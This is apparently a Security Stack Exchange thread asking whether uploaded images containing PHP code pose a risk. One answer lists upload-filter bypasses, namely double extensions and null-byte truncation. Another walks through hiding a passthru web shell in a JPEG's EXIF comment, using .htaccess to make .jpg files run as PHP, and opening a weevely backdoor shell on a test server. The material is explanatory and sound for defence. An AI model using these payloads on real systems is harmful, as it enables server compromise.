4

In my website, a user can upload his profile picture. After analysis of some pictures, I have found some pictures with malicious PHP code, just like the upload script. As an example, I have found a single line code of PHP:

<?php echo $_GET['a']; ?>

So by using this code, if he can upload this picture as a .php file, such as picture.php, then he can run this script by doing something like url/pictur.php?a=[anything]. But the picture can't be uploaded as .php extension since all picture extensions are automatically changed to .jpg. Additionally, I never include the picture by php function include. Rather, I always add image with html img tag.

I know that the best practice to stop malicious people is to resize image. Is it possible for a malicious person to harm with this kind of image?

Adi
  • 43,808
  • 16
  • 135
  • 167
Imran Abdur Rahim
  • 207
  • 2
  • 3
  • 8
  • See http://security.stackexchange.com/questions/32852/risks-of-a-php-image-upload-form , http://security.stackexchange.com/questions/32967/is-it-possible-to-execute-a-php-script-in-an-image-file and http://security.stackexchange.com/questions/3919/how-to-defend-vs-image-remote-file-inclusion-e-g-rfi-using-a-gif-file-apach – mr.spuratic Mar 24 '14 at 09:30

4 Answers4

4

While you may never run the code locally on your server, it may be possible to upload malicious JavaScript code. Then the attacker can point to your site when he needs to reference the code in other attacks (e.g., XSS). There may also be rare situations where PHP or other server side code may be consumed from this image.

There may be misconfigurations in your server or the attacker may just upload the attack image wherever hoping for some kind of include() of eval() to take place.

e.g., see this example (from 2008, but some attacks may still work on outdatted webservers - I recommend reading through the rest of the thread for interesting concepts):

If the server changes the extension to .JPG/.GIF (or only allows those extensions), then you need to be more creative. On Apache, you can name a file something.php.jpg, and Apache will still treat it as PHP.

Another option you can try is by sending an upload request (with a tool or a HTTP request editor) that embeds a NULL byte before the .JPG extension. ASP scripts tend to be vulnerable to this -- the script will see the entire file name, but the underlying file operation will truncate the name of the file after the NULL byte. So something.asp%00.jpg would become something.asp.

Another walkthrough of an PHP code embeded in an image.

Eric G
  • 9,691
  • 4
  • 31
  • 58
2

In order to manipulate the EXIF JPEG metadata fields, I will use the command line jhead tool. There exist many other tools out there with similar functionality to choose for your needs.

Now that we have our metadata manipulation tool lets pick up a random jpeg image and read the metadata.

root@testbed:~# jhead image.jpg
File name    : image.jpg
File size    : 208103 bytes
File date    : 2011:09:07 21:20:10
Date/Time    : 2007:04:24 14:11:55
Resolution   : 1197 x 478
======= IPTC data: =======
Record vers.  : 2

The file is pretty much clean so lets make it a little bit dirtier by hiding some PHP code in the metadata comment field. To edit the comment field, I will use the -ce flag of the jhead tool.

root@testbed:~# jhead -ce image.jpg
Modified: image.jpg
root@testbed:~# jhead image.jpg
File name    : image.jpg
File size    : 182007 bytes
File date    : 2011:09:07 21:20:10
Resolution   : 1197 x 478
Comment      : <?php passthru($_POST['cmd']); __halt_compiler();

Using the passthru function we can execute an external command to the target machine. The command is passed to the target using the POST method under the “cmd” name. Here someone might think that we can use the GET method too in order to pass the command to the target machine. That’s true, we can also use it, although the commands that we send to the target are easily noticeable in the httpd access log because they are part of the URL.

The halt_compiler command will stop the compiler from parsing the images binary data. Metadata info is stored before the images data, so we need to stop the compiler after our code, because if a <? occurs in the following binary data the execution will break. That’s why we do not need to close the PHP section.

Now that we have hide our PHP code in the image file, we need to force the target web server to handle the .jpg file as a PHP file. To achieve this we will use the AddType directive in a .htaccess file. AddType directive maps a given filename extension onto a specified content type. In order to use the AddType directive, the target Apache must have mod_mime enabled and allow at least FileInfo override in the directory that we will put the file.

We will upload the malicious jpg file into the media path, so we need to put a .htaccess in the relevant dir with the AddType directive mapping .jpg files onto .php.

root@webtestbed:/var/www/media# echo “AddType application/x-httpd-php .jpg” >> .htaccess

OK, everything is set up so lets launch our first attempt to execute a command in the target machine. To send the command using the POST method, I will use the curl tool.

root@testbed:~# curl -d cmd=id http://192.168.2.11/media/image.jpg
.........JFIF..........................................................uid=33(www-data) gid=33(www-data) groups=33(www-data)

Bingo! the command has been successfully executed in the target machine. The garbage at the begging of the output is caused by the data of the image’s header.

Something that must be mentioned here, is that some PHP configurations might have passthru included into their disabled functions. In that case you can choose a similar function like system, exec, shell_exec, etc.

Now that we have confirmed that our technique is working lets hide a whole PHP backdoor shell in the comment field of the same image. For that purpose, I will choose the weevely PHP shell, but you can choose an alternative shell that you have in your pentest arsenal.

Initially we create the shell with the weevely script and then copy the generated PHP code into the metadata comment field.

root@testbed:weevely# ./weevely.py -g -o back.php -p admin
Weevely 0.3 - Generate and manage stealth PHP backdoors.
Copyright (c) 2011-2012 Weevely Developers
Website: http://code.google.com/p/weevely/
+ Backdoor file 'back.php' created with password 'admin'.

Finally, in order to establish a terminal with the target server, we call weevely with the terminal flag giving the image URL and the password that we used in the creation step.

root@testbed:weevely# ./weevely.py -t -p admin -u http://192.168.2.11/media/image.jpg
Weevely 0.3 – Generate and manage stealth PHP backdoors.
Copyright (c) 2011-2012 Weevely Developers
Website: http://code.google.com/p/weevely/
+ Using method ‘system()’.
+ Retrieving terminal basic environment variables .

[www-data@webtestbed /var/www/media] ls
image.jpg
[www-data@webtestbed /var/www/media] id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
[www-data@webtestbed /var/www/media]

Pwned! We have Apache user (www-data) privileges access to the target machine.

nhahtdh
  • 131
  • 1
  • 8
  • That's an impressive bit of code but your answer would be a lot more useful if you also explained where you got it and how it pertains to the question. Just because it's obvious to you doesn't mean it's obvious to everyone. – Shadur Mar 24 '14 at 08:17
  • what is this ? how can u upload an `.htaccess` file to execute jpg as php ? – Imran Abdur Rahim Mar 24 '14 at 08:18
  • 10
    This would be more impressive if step 2 weren't "reconfigure the server in an obviously broken way to permit the attack to work". – Mark Mar 24 '14 at 09:44
  • This part 'root@webtestbed:/var/www/media# echo “AddType application/x-httpd-php .jpg” >> .htaccess' needs cli access... I dunno how you'd place a .htaccess file when the server already has it's default .htaccess file, also... as Mark mentions you are needing to reconfigure these settings (which can only be done with root access)... I think there are too many 'hopeful' factors that a reliant for this to work. I think it's got some great thinking behind it, but wouldn't work as mentioned... I'd be impressed if you can recreate this on a remote server and gain access from a 'client' machine – josh.thomson Feb 02 '15 at 10:45
-1

I'm not aware of any risks to a server from images with malicious embedded code, but Internet Explorer has a well-known "feature" where it will ignore a file's extension and MIME type, and instead analyze the file to figure out what type it is. Images with embedded HTML will be treated as web pages, and can be used to execute an attack on IE.

Mark
  • 34,390
  • 9
  • 85
  • 134
-4

in law it is: in dubio pro reo, in it sec it's: in dobio pro h4x0r, /me thinx. i remember some attacks using this method, but i cant recall the apps beeing used.
are you 100% sure the attacker has no way to execute this code?

if the target is not you, but your visitiors, then an attacker might hide malicious stuff that doesnt harm you, but your visitors; i remember something about "owning windows with a jpeg - in 2014" - blogposts lately

  • How can he execute a php code with `.jpg` extension ? May be no chance here. But i think if there any possibility to http header injection, or directory traversal attack. – Imran Abdur Rahim Mar 24 '14 at 08:03